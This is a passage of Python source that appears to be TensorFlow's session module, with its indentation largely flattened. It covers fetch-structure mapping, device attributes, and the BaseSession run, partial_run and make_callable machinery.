_FetchMapper.for_fetch(fetch) for fetch in fetches.values()
]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
def _generator():
for k, m, vi in zip(self._keys, self._mappers, self._value_indices):
yield k, m.build_results([values[j] for j in vi])
return self._type_ctor(_generator())
class _AttrsFetchMapper(_FetchMapper):
"""Fetch mapper for attrs decorated classes."""
def __init__(self, fetches):
"""Creates a _AttrsFetchMapper.
Args:
fetches: An instance of an attrs decorated class.
"""
values = _get_attrs_values(fetches)
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in values]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
return self._fetch_type(*results)
class _FetchHandler(object):
"""Handler for structured fetches.
Given a graph, a user-provided structure for fetches, and a feed dict, this
class takes care of generating a list of tensor names to fetch and op names
to run for a low level `run()` call.
Given the results of the low level run call, this class can also rebuild a
result structure matching the user-provided structure for fetches, but
containing the corresponding results.
"""
# TODO(touts): Make this class also take care of destructuring the feed
# dict instead of doing it in the callers.
def __init__(self, graph, fetches, feeds, feed_handles=None):
"""Creates a fetch handler.
Args:
graph: Graph of the fetches. Used to check for fetchability and to
convert all fetches to tensors or ops as needed.
fetches: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
feeds: A feed dict where keys are Tensors.
feed_handles: A dict from feed Tensors to TensorHandle objects used as
direct feeds.
"""
with graph.as_default():
self._fetch_mapper = _FetchMapper.for_fetch(fetches)
self._fetches = []
self._targets = []
self._feeds = feeds
self._feed_handles = feed_handles or {}
self._ops = []
self._fetch_handles = {}
for fetch in self._fetch_mapper.unique_fetches():
if isinstance(fetch, ops.Operation):
self._assert_fetchable(graph, fetch)
self._targets.append(fetch)
self._ops.append(True)
else:
self._assert_fetchable(graph, fetch.op)
self._fetches.append(fetch)
self._ops.append(False)
# Remember the fetch if it is for a tensor handle.
if (isinstance(fetch, ops.Tensor) and
(fetch.op.type == 'GetSessionHandle' or
fetch.op.type == 'GetSessionHandleV2')):
self._fetch_handles[fetch.ref()] = fetch.op.inputs[0].dtype
self._final_fetches = [x for x in self._fetches if x.ref() not in feeds]
def _assert_fetchable(self, graph, op):
if not graph.is_fetchable(op):
raise errors.InaccessibleTensorError(
'Operation %r has been marked as not fetchable. Typically this'
' happens when it is defined in another function or code block.'
          ' Use return values, explicit Python locals or TensorFlow collections'
' to access it.'
% op.name)
def fetches(self):
"""Return the unique names of tensors to fetch.
Returns:
A list of strings.
"""
return self._final_fetches
def targets(self):
"""Return the unique names of ops to run.
Returns:
A list of strings.
"""
return self._targets
def build_results(self, session, tensor_values):
"""Build results matching the original fetch shape.
`tensor_values` must be a list of the same length as
the one returned by `fetches()`, and holding the requested
fetch values.
This method builds a struct with the same shape as the original `fetches`
passed to the constructor, in which the fetches are replaced by their
fetched value.
Args:
session: The enclosing session. Used for tensor handles.
tensor_values: List of values matching the list returned by fetches().
Returns:
A structure of the same shape as the original `fetches` argument but
containing tensors or None (for fetched ops).
"""
full_values = []
assert len(self._final_fetches) == len(tensor_values)
i = 0
j = 0
for is_op in self._ops:
if is_op:
full_values.append(None)
else:
# If the fetch was in the feeds, use the fed value, otherwise
# use the returned value.
if self._fetches[i].ref() in self._feed_handles:
# A fetch had a corresponding direct TensorHandle feed. Call eval()
# to obtain the Tensor value from the TensorHandle.
value = self._feed_handles[self._fetches[i].ref()].eval()
else:
value = self._feeds.get(self._fetches[i].ref())
if value is None:
value = tensor_values[j]
j += 1
dtype = self._fetch_handles.get(self._fetches[i].ref())
if dtype:
full_values.append(session_ops.TensorHandle(value, dtype, session))
else:
full_values.append(value)
i += 1
assert j == len(tensor_values)
return self._fetch_mapper.build_results(full_values)
def _name_list(tensor_list):
"""Utility function for transitioning to the new session API.
Args:
tensor_list: a list of `Tensor`s.
Returns:
A list of each `Tensor`s name (as byte arrays).
"""
return [compat.as_bytes(t.name) for t in tensor_list]
class _DeviceAttributes(object):
"""Struct-like object describing a device's attributes.
Each device has 3 key properties:
- name: the fully-qualified TensorFlow path to the device. For
example: /job:worker/replica:0/task:3/device:CPU:0
- device_type: the type of the device (e.g. CPU, GPU, TPU, etc.)
- memory_limit_bytes: the maximum amount of memory available on the device
(in bytes).
"""
def __init__(self, name, device_type, memory_limit_bytes, incarnation):
self._name = device.canonical_name(name)
self._device_type = device_type
self._memory_limit_bytes = memory_limit_bytes
self._incarnation = incarnation
@property
def name(self):
return self._name
@property
def device_type(self):
return self._device_type
@property
def memory_limit_bytes(self):
return self._memory_limit_bytes
@property
def incarnation(self):
return self._incarnation
def __repr__(self):
return '_DeviceAttributes(%s, %s, %d, %d)' % (
self.name,
self.device_type,
self.memory_limit_bytes,
self.incarnation,
)
class BaseSession(SessionInterface):
"""A class for interacting with a TensorFlow computation.
The BaseSession enables incremental graph building with inline
execution of Operations and evaluation of Tensors.
"""
def __init__(self, target='', graph=None, config=None):
"""Constructs a new TensorFlow session.
Args:
target: (Optional) The TensorFlow execution engine to connect to.
graph: (Optional) The graph to be used. If this argument is None, the
default graph will be used.
config: (Optional) ConfigProto proto used to configure the session. If no
config is specified, the global default will be used. The global default
can be configured via the tf.config APIs.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
creating the TensorFlow session.
TypeError: If one of the arguments has the wrong type.
"""
_python_session_create_counter.get_cell().increase_by(1)
if graph is None:
self._graph = ops.get_default_graph()
else:
if not isinstance(graph, ops.Graph):
raise TypeError('graph must be a tf.Graph, but got %s' % type(graph))
self._graph = graph
self._closed = False
if target is not None:
try:
self._target = compat.as_bytes(target)
except TypeError:
if isinstance(target, config_pb2.ConfigProto):
raise TypeError('target must be a string, but got %s.'
' Did you do "Session(config)" instead of'
' "Session(config=config)"?' % type(target))
raise TypeError('target must be a string, but got %s' % type(target))
else:
self._target = None
self._delete_lock = threading.Lock()
self._dead_handles = []
if config is None:
config = context.context().config
if not isinstance(config, config_pb2.ConfigProto):
raise TypeError('config must be a tf.ConfigProto, but got %s' %
type(config))
if (mixed_precision_global_state.mixed_precision_graph_rewrite_is_enabled
and config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.OFF):
new_config = config_pb2.ConfigProto()
new_config.CopyFrom(config)
new_config.graph_options.rewrite_options.auto_mixed_precision = (
rewriter_config_pb2.RewriterConfig.ON)
config = new_config
elif (config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.ON):
mixed_precision_global_state.non_mixed_precision_session_created = True
self._config = config
self._add_shapes = config.graph_options.infer_shapes
self._session = None
opts = tf_session.TF_NewSessionOptions(target=self._target, config=config)
try:
# pylint: disable=protected-access
self._session = tf_session.TF_NewSessionRef(self._graph._c_graph, opts)
# pylint: enable=protected-access
finally:
tf_session.TF_DeleteSessionOptions(opts)
def list_devices(self):
"""Lists available devices in this session.
```python
devices = sess.list_devices()
for d in devices:
print(d.name)
```
Where:
Each element in the list has the following properties
name: A string with the full name of the device. ex:
`/job:worker/replica:0/task:3/device:CPU:0`
device_type: The type of the device (e.g. `CPU`, `GPU`, `TPU`.)
memory_limit: The maximum amount of memory available on the device.
Note: depending on the device, it is possible the usable memory could
be substantially less.
Raises:
tf.errors.OpError: If it encounters an error (e.g. session is in an
invalid state, or network errors occur).
Returns:
A list of devices in the session.
"""
raw_device_list = tf_session.TF_SessionListDevices(self._session)
device_list = []
size = tf_session.TF_DeviceListCount(raw_device_list)
for i in range(size):
name = tf_session.TF_DeviceListName(raw_device_list, i)
device_type = tf_session.TF_DeviceListType(raw_device_list, i)
memory = tf_session.TF_DeviceListMemoryBytes(raw_device_list, i)
incarnation = tf_session.TF_DeviceListIncarnation(raw_device_list, i)
device_list.append(
_DeviceAttributes(name, device_type, memory, incarnation))
tf_session.TF_DeleteDeviceList(raw_device_list)
return device_list
def close(self):
"""Closes this session.
Calling this method frees all resources associated with the session.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
closing the TensorFlow session.
"""
if self._session and not self._closed:
self._closed = True
tf_session.TF_CloseSession(self._session)
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
if self._session is not None:
try:
tf_session.TF_DeleteSession(self._session)
except (AttributeError, TypeError):
# At shutdown, `c_api_util`, `tf_session`, or
# `tf_session.TF_DeleteSession` may have been garbage collected, causing
# the above method calls to fail. In this case, silently leak since the
# program is about to terminate anyway.
pass
self._session = None
@property
def graph(self):
"""The graph that was launched in this session."""
return self._graph
@property
def graph_def(self):
"""A serializable version of the underlying TensorFlow graph.
Returns:
A graph_pb2.GraphDef proto containing nodes for all of the Operations in
the underlying TensorFlow graph.
"""
return self._graph.as_graph_def(add_shapes=self._add_shapes)
@property
def sess_str(self):
return self._target
def as_default(self):
"""Returns a context manager that makes this object the default session.
Use with the `with` keyword to specify that calls to
`tf.Operation.run` or `tf.Tensor.eval` should be executed in
this session.
```python
c = tf.constant(..)
sess = tf.compat.v1.Session()
with sess.as_default():
assert tf.compat.v1.get_default_session() is sess
print(c.eval())
```
To get the current default session, use `tf.compat.v1.get_default_session`.
*N.B.* The `as_default` context manager *does not* close the
session when you exit the context, and you must close the session
explicitly.
```python
c = tf.constant(...)
sess = tf.compat.v1.Session()
with sess.as_default():
print(c.eval())
# ...
with sess.as_default():
print(c.eval())
sess.close()
```
Alternatively, you can use `with tf.compat.v1.Session():` to create a
session that is automatically closed on exiting the context,
including when an uncaught exception is raised.
*N.B.* The default session is a property of the current thread. If you
create a new thread, and wish to use the default session in that
thread, you must explicitly add a `with sess.as_default():` in that
thread's function.
*N.B.* Entering a `with sess.as_default():` block does not affect
the current default graph. If you are using multiple graphs, and
`sess.graph` is different from the value of
`tf.compat.v1.get_default_graph`, you must explicitly enter a
`with sess.graph.as_default():` block to make `sess.graph` the default
graph.
Returns:
A context manager using this session as the default session.
"""
return ops.default_session(self)
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations and evaluates tensors in `fetches`.
This method runs one "step" of TensorFlow computation, by
running the necessary graph fragment to execute every `Operation`
and evaluate every `Tensor` in `fetches`, substituting the values in
`feed_dict` for the corresponding input values.
The `fetches` argument may be a single graph element, or an arbitrarily
nested list, tuple, namedtuple, dict, or OrderedDict containing graph
elements at its leaves. A graph element can be one of the following types:
* A `tf.Operation`.
The corresponding fetched value will be `None`.
* A `tf.Tensor`.
The corresponding fetched value will be a numpy ndarray containing the
value of that tensor.
* A `tf.sparse.SparseTensor`.
The corresponding fetched value will be a
`tf.compat.v1.SparseTensorValue`
containing the value of that sparse tensor.
* A `get_tensor_handle` op. The corresponding fetched value will be a
numpy ndarray containing the handle of that tensor.
* A `string` which is the name of a tensor or operation in the graph.
The value returned by `run()` has the same shape as the `fetches` argument,
where the leaves are replaced by the corresponding values returned by
TensorFlow.
Example:
```python
a = tf.constant([10, 20])
b = tf.constant([1.0, 2.0])
# 'fetches' can be a singleton
v = session.run(a)
# v is the numpy array [10, 20]
# 'fetches' can be a list.
v = session.run([a, b])
# v is a Python list with 2 numpy arrays: the 1-D array [10, 20] and the
# 1-D array [1.0, 2.0]
# 'fetches' can be arbitrary lists, tuples, namedtuple, dicts:
MyData = collections.namedtuple('MyData', ['a', 'b'])
v = session.run({'k1': MyData(a, b), 'k2': [b, a]})
# v is a dict with
# v['k1'] is a MyData namedtuple with 'a' (the numpy array [10, 20]) and
# 'b' (the numpy array [1.0, 2.0])
# v['k2'] is a list with the numpy array [1.0, 2.0] and the numpy array
# [10, 20].
```
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. Each key in `feed_dict` can be
one of the following types:
* If the key is a `tf.Tensor`, the
value may be a Python scalar, string, list, or numpy ndarray
that can be converted to the same `dtype` as that
tensor. Additionally, if the key is a
`tf.compat.v1.placeholder`, the shape of
the value will be checked for compatibility with the placeholder.
* If the key is a
`tf.sparse.SparseTensor`,
the value should be a
`tf.compat.v1.SparseTensorValue`.
* If the key is a nested tuple of `Tensor`s or `SparseTensor`s, the value
should be a nested tuple with the same structure that maps to their
corresponding values as above.
Each value in `feed_dict` must be convertible to a numpy array of the dtype
of the corresponding key.
The optional `options` argument expects a [`RunOptions`] proto. The options
allow controlling the behavior of this particular step (e.g. turning tracing
on).
The optional `run_metadata` argument expects a [`RunMetadata`] proto. When
appropriate, the non-Tensor output of this step will be collected there. For
example, when users turn on tracing in `options`, the profiled info will be
collected into this argument and passed back.
Args:
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (described
above).
feed_dict: A dictionary that maps graph elements to values (described
above).
options: A [`RunOptions`] protocol buffer
run_metadata: A [`RunMetadata`] protocol buffer
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary (described above).
Order in which `fetches` operations are evaluated inside the call
is undefined.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
ValueError: If `fetches` or `feed_dict` keys are invalid or refer to a
`Tensor` that doesn't exist.
"""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
result = self._run(None, fetches, feed_dict, options_ptr,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return result
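# Hedged usage sketch (illustrative, not part of this module): feeding a
# placeholder through `feed_dict` and fetching a dict of tensors, assuming
# TF1-style graph mode. The names `x` and `y` are assumptions for the example.
#
#   import tensorflow.compat.v1 as tf
#   tf.disable_eager_execution()
#   x = tf.placeholder(tf.float32, shape=[None])
#   y = x * 2.0
#   with tf.Session() as sess:
#       out = sess.run({'doubled': y}, feed_dict={x: [1.0, 2.0, 3.0]})
#       # out['doubled'] -> array([2., 4., 6.], dtype=float32)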
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with more feeds and fetches.
This is EXPERIMENTAL and subject to change.
To use partial execution, a user first calls `partial_run_setup()` and
then a sequence of `partial_run()`. `partial_run_setup` specifies the
list of feeds and fetches that will be used in the subsequent
`partial_run` calls.
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. See run() for more information.
Below is a simple example:
```python
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.multiply(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
res = sess.partial_run(h, r2, feed_dict={c: res})
```
Args:
handle: A handle for a sequence of partial runs.
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (see
documentation for `run`).
feed_dict: A dictionary that maps graph elements to values (described
above).
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary
(see documentation for `run`).
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# TODO(touts): Support feeding and fetching the same tensor.
return self._run(handle, fetches, feed_dict, None, None)
def partial_run_setup(self, fetches, feeds=None):
"""Sets up a graph with feeds and fetches for partial run.
This is EXPERIMENTAL and subject to change.
Note that contrary to `run`, `feeds` only specifies the graph elements.
The tensors will be supplied by the subsequent `partial_run` calls.
Args:
fetches: A single graph element, or a list of graph elements.
feeds: A single graph element, or a list of graph elements.
Returns:
A handle for partial run.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
tf.errors.OpError: Or one of its subclasses if a TensorFlow error happens.
"""
def _feed_fn(feed):
for tensor_type, _, _, feed_fn in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
if feeds is None:
feeds = []
# Create request.
feed_list = []
# Validate and process feed_list.
is_list_feed = isinstance(feeds, (list, tuple))
if not is_list_feed:
feeds = [feeds]
for feed in feeds:
for subfeed in _feed_fn(feed):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
# pylint: disable=protected-access
feed_list.append(subfeed_t._as_tf_output())
# pylint: enable=protected-access
except Exception as e:
e.message = ('Cannot interpret feed_list key as Tensor: ' + e.message)
e.args = (e.message,)
raise e
# Validate and process fetches.
# TODO(touts): Support feeding and fetching the same tensor.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# Set up a graph with feeds and fetches for partial run.
def _setup_fn(session, feed_list, fetch_list, target_list):
self._extend_graph()
return tf_session.TF_SessionPRunSetup_wrapper(session, feed_list,
fetch_list, target_list)
# pylint: disable=protected-access
final_fetches = [t._as_tf_output() for t in fetch_handler.fetches()]
final_targets = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
return self._do_call(_setup_fn, self._session, feed_list, final_fetches,
final_targets)
def _run(self, handle, fetches, feed_dict, options, run_metadata):
"""Perform either run or partial_run, depending the presence of `handle`."""
def _feed_fn(feed, feed_val):
for tensor_type, _, feed_fn, _ in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed, feed_val)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
# Create request.
feed_dict_tensor = {}
feed_map = {}
# Validate and process feed_dict.
feed_handles = {}
if feed_dict:
feed_dict = nest.flatten_dict_items(feed_dict)
for feed, feed_val in feed_dict.items():
for subfeed, subfeed_val in _feed_fn(feed, feed_val):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
except Exception as e:
raise TypeError('Cannot interpret feed_dict key as Tensor: ' +
e.args[0])
if isinstance(subfeed_val, ops.Tensor):
raise TypeError('The value of a feed cannot be a tf.Tensor object. '
'Acceptable feed values include Python scalars, '
'strings, lists, numpy ndarrays, or TensorHandles. '
'For reference, the tensor object was ' +
str(feed_val) + ' which was passed to the '
'feed with key ' + str(feed) + '.')
subfeed_dtype = subfeed_t.dtype.as_numpy_dtype
if isinstance(subfeed_val, int) and _convert_to_numpy_obj(
subfeed_dtype, subfeed_val) != subfeed_val:
raise TypeError(
'Type of feed value ' + str(subfeed_val) + ' with type ' +
str(type(subfeed_val)) +
' is not compatible with Tensor type ' + str(subfeed_dtype) +
'. Try explicitly setting the type of the feed tensor'
' to a larger type (e.g. int64).')
is_tensor_handle_feed = isinstance(subfeed_val,
session_ops.TensorHandle)
if is_tensor_handle_feed:
np_val = subfeed_val.to_numpy_array()
feed_handles[subfeed_t.ref()] = subfeed_val
else:
np_val = np.asarray(subfeed_val, dtype=subfeed_dtype)
if (not is_tensor_handle_feed and
not subfeed_t.get_shape().is_compatible_with(np_val.shape)):
raise ValueError(
'Cannot feed value of shape %r for Tensor %r, '
'which has shape %r' %
(np_val.shape, subfeed_t.name, str(subfeed_t.get_shape())))
if not self.graph.is_feedable(subfeed_t):
raise ValueError('Tensor %s may not be fed.' % subfeed_t)
feed_dict_tensor[subfeed_t.ref()] = np_val
feed_map[compat.as_bytes(subfeed_t.name)] = (subfeed_t, subfeed_val)
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(
self._graph, fetches, feed_dict_tensor, feed_handles=feed_handles)
# Run request and get response.
# We need to keep the returned movers alive for the following _do_run().
# These movers are no longer needed when _do_run() completes, and
# are deleted when `movers` goes out of scope when this _run() ends.
# TODO(yuanbyu, keveman): Revisit whether we should just treat feeding
# of a handle from a different device as an error.
_ = self._update_with_movers(feed_dict_tensor, feed_map)
final_fetches = fetch_handler.fetches()
final_targets = fetch_handler.targets()
# We only want to really perform the run if fetches or targets are provided,
# or if the call is a partial run that specifies feeds.
if final_fetches or final_targets or (handle and feed_dict_tensor):
results = self._do_run(handle, final_targets, final_fetches,
feed_dict_tensor, options, run_metadata)
else:
results = []
return fetch_handler.build_results(self, results)
def make_callable(self, fetches, feed_list=None, accept_options=False):
"""Returns a Python callable that runs a particular step.
The returned callable will take `len(feed_list)` arguments whose types
must be compatible feed values for the respective elements of `feed_list`.
For example, if element `i` of `feed_list` is a `tf.Tensor`, the `i`th
argument to the returned callable must be a numpy ndarray (or something
convertible to an ndarray) with matching element type and shape. See
`tf.Session.run` for details of the allowable feed key and value types.
The returned callable will have the same return type as
`tf.Session.run(fetches, ...)`. For example, if `fetches` is a `tf.Tensor`,
the callable will return a numpy ndarray; if `fetches` is a `tf.Operation`,
it will return `None`.
Args:
fetches: A value or list of values to fetch. See `tf.Session.run` for
details of the allowable fetch types.
feed_list: (Optional.) A list of `feed_dict` keys. See `tf.Session.run`
for details of the allowable feed key types.
accept_options: (Optional.) If `True`, the returned `Callable` will be
able to accept `tf.compat.v1.RunOptions` and `tf.compat.v1.RunMetadata`
as optional keyword arguments `options` and `run_metadata`,
respectively, with the same syntax and semantics as `tf.Session.run`,
which is useful for certain use cases (profiling and debugging) but will
result in measurable slowdown of the `Callable`'s
performance. Default: `False`.
Returns:
A function that when called will execute the step defined by
`feed_list` and `fetches` in this session.
Raises:
TypeError: If `fetches` or `feed_list` cannot be interpreted
as arguments to `tf.Session.run`.
"""
if feed_list is not None:
if not isinstance(feed_list, (list, tuple)):
raise TypeError('`feed_list` must be a list or tuple.')
# Delegate any non-empty feed lists to the existing `run()` logic.
# TODO(mrry): Refactor the feed handling logic from
# `Session._run()` so that we can convert the feeds to a list of
# strings here.
def _generic_run(*feed_args, **kwargs):
feed_dict = {
feed: feed_val for feed, feed_val in zip(feed_list, feed_args)
}
return self.run(fetches, feed_dict=feed_dict, **kwargs)
return _generic_run
# Ensure any changes to the graph are reflected in the runtime.
# Note that we don't need to do this on subsequent calls to the
# returned object, because the arguments to `fetches` must already be
# in the graph.
self._extend_graph()
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(self._graph, fetches, {})
# pylint: disable=protected-access
fetch_list = [t._as_tf_output() for t in fetch_handler.fetches()]
target_list = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
def _callable_template_with_options_and_metadata(fetch_list,
target_list,
fetch_handler,
options=None,
run_metadata=None):
"""Template callable that accepts RunOptions and RunMetadata."""
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
results = self._call_tf_sessionrun(options_ptr, {}, fetch_list,
target_list, run_metadata_ptr)
if fetch_handler:
results = fetch_handler.build_results(self, results)
else:
results = results[0] if results else None
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
return results
if accept_options:
return functools.partial(_callable_template_with_options_and_metadata,
fetch_list, target_list, fetch_handler)
elif isinstance(fetches, ops.Operation):
# Special case for fetching a single operation, because the
# function will have no return value.
assert not fetch_list
assert len(target_list) == 1
def _single_operation_run():
self._call_tf_sessionrun(None, {}, [], target_list, None)
return _single_operation_run
elif isinstance(fetches, ops.Tensor):
# Special case for fetching a single tensor, because the
# function can return the result of `TF_Run()` directly.
assert len(fetch_list) == 1
assert not target_list
def _single_tensor_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, [], None)
return results[0]
return _single_tensor_run
else:
# In all other cases, we must use `fetch_handler` to build the
# results for us.
def _fetch_handler_run():
results = self._call_tf_sessionrun(None, {}, fetch_list, target_list,
None)
return fetch_handler.build_results(self, results)
return _fetch_handler_run
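# Hedged usage sketch (illustrative, not part of this module): building the
# callable once and invoking it repeatedly avoids the per-call fetch/feed
# processing done by `run()`. The tensors `x` and `y` are assumptions.
#
#   x = tf.compat.v1.placeholder(tf.float32, shape=[2])
#   y = x + 1.0
#   with tf.compat.v1.Session() as sess:
#       step = sess.make_callable(y, feed_list=[x])
#       step([1.0, 2.0])   # -> array([2., 3.], dtype=float32)
#       step([3.0, 4.0])   # -> array([4., 5.], dtype=float32)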
# Captures the name of a node in an error status. The regex below matches
# both the old and the new formats:
# Old format: [[Node: <node_name> = ...]]
# New format: [[{{node <node_name>}} = ...]]
_NODEDEF_NAME_RE = re.compile(
r'\[\[(Node: )?(\{\{node )?([^\} ]*)(\}\})?\s*=*')
def _do_run(self, handle, target_list, fetch_list, feed_dict, options,
run_metadata):
"""Runs a step based on the given fetches and feeds.
Args:
handle: a handle for partial_run. None if this is just a call to run().
target_list: A list of operations to be run, but not fetched.
fetch_list: A list of tensors to be fetched.
feed_dict: A dictionary that maps tensors to numpy ndarrays.
options: A (pointer to a) [`RunOptions`] protocol buffer, or None
run_metadata: A (pointer to a) [`RunMetadata`] protocol buffer, or None
Returns:
A list of numpy ndarrays, corresponding to the elements of
`fetch_list`. If the ith element of `fetch_list` contains the
name of an operation, the first Tensor output of that operation
will be returned for that element.
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# pylint: disable=protected-access
feeds = dict((t.deref()._as_tf_output(), v) for t, v in feed_dict.items())
fetches = [t._as_tf_output() for t in fetch_list]
targets = [op._c_op for op in target_list]
# pylint: enable=protected-access
def _run_fn(feed_dict, fetch_list, target_list, options, run_metadata):
# Ensure any changes to the graph are reflected in the runtime.
self._extend_graph()
return self._call_tf_sessionrun(options, feed_dict, fetch_list,
target_list, run_metadata)
def _prun_fn(handle, feed_dict, fetch_list):
if target_list:
raise RuntimeError('partial_run() requires empty target_list.')
return self._call_tf_sessionprun(handle, feed_dict, fetch_list)
if handle is None:
return self._do_call(_run_fn, feeds, fetches, targets, options,
run_metadata)
else:
return self._do_call(_prun_fn, handle, feeds, fetches)
def _do_call(self, fn, *args):
try:
return fn(*args)
except errors.OpError as e:
message = compat.as_text(e.message)
m = BaseSession._NODEDEF_NAME_RE.search(message)
node_def = None
op = None
if m is not None:
node_name = m.group(3)
try:
op = self._graph.get_operation_by_name(node_name)
node_def = op.node_def
except KeyError:
pass
message = error_interpolation.interpolate(message, self._graph)
if 'only supports NHWC tensor format' in message:
message += ('\nA possible workaround: Try disabling Grappler optimizer'
'\nby modifying the config for creating the session eg.'
'\nsession_config.graph_options.rewrite_options.'
'disable_meta_optimizer = True')
raise type(e)(node_def, op, message)
def _extend_graph(self):
with self._graph._session_run_lock(): # pylint: disable=protected-access
tf_session.ExtendSession(self._session)
# The threshold to run garbage collection to delete dead tensors.
_DEAD_HANDLES_THRESHOLD = 10
def _register_dead_handle(self, handle):
# Register a dead handle in the session. Delete the dead tensors when
# the number of dead tensors exceeds certain threshold.
tensors_to_delete = None
with self._delete_lock:
self._dead_handles.append(handle)
if len(self._dead_handles) == BaseSession._DEAD_HANDLES_THRESHOLD:
tensors_to_delete = self._dead_handles
self._dead_handles = []
# Delete the dead tensors.
if tensors_to_delete:
feeds = {}
fetches = []
for deleter_key, tensor_handle in enumerate(tensors_to_delete):
holder, deleter = session_ops._get_handle_deleter(
self.graph, deleter_key, tensor_handle)
feeds[holder] = tensor_handle
fetches.append(deleter)
self.run(fetches, feed_dict=feeds)
def _update_with_movers(self, feed_dict, feed_map):
# If a tensor handle that is fed to a device incompatible placeholder,
# we move the tensor to the right device, generate a new tensor handle,
# and update `feed_dict` to use the new handle.
handle_movers = []
for feed_name, val in feed_map.items():
mover = session_ops._get_handle_mover(self.graph, *val)
if mover:
handle_movers.append((feed_name, val[1], mover))
# Transfer a tensor to the right device if needed.
if not handle_movers:
return []
else:
feeds = {}
fetches = []
for _, handle, mover in handle_movers:
feeds[mover[0]] = handle
fetches.append(mover[1])
handles = self.run(fetches, feed_dict=feeds)
for handle_mover, handle in zip(handle_movers, handles):
np_val = np.array(handle.handle, dtype=object)
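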
feed_name = handle_mover[0]
feed_tensor = feed_map[feed_name][0]
feed_dict[feed_tensor.ref()] = np_val
return handles
def _call_tf_sessionrun(self, options, feed_dict, fetch_list, target_list,
run_metadata):
return tf_session.TF_SessionRun_wrapper(self._session, options, feed_dict,
fetch_list, target_list,
run_metadata)
def _call_tf_sessionprun(self, handle, feed_dict, fetch_list):
return tf_session.TF_SessionPRun_wrapper(self._session, handle, feed_dict,
fetch_list)
# pylint: disable=protected-access
class _Callable(object):
"""Experimental wrapper for the C++ `Session::MakeCallable()` API."""
def __init__(self, session, callable_options):
self._session = session
self._handle = None
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(callable_options.SerializeToString()))
try:
self._handle = tf_session.TF_SessionMakeCallable(
session._session, options_ptr)
finally:
tf_session.TF_DeleteBuffer(options_ptr)
def __call__(self, *args, **kwargs):
# TODO(b/74355905): Support argument and return value nested structures,
# and tensor-like objects such as SparseTensors.
run_metadata = kwargs.get('run_metadata', None)
try:
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
ret = tf_session.TF_SessionRunCallable(self._session._session,
self._handle, args,
run_metadata_ptr)
if run_metadata:
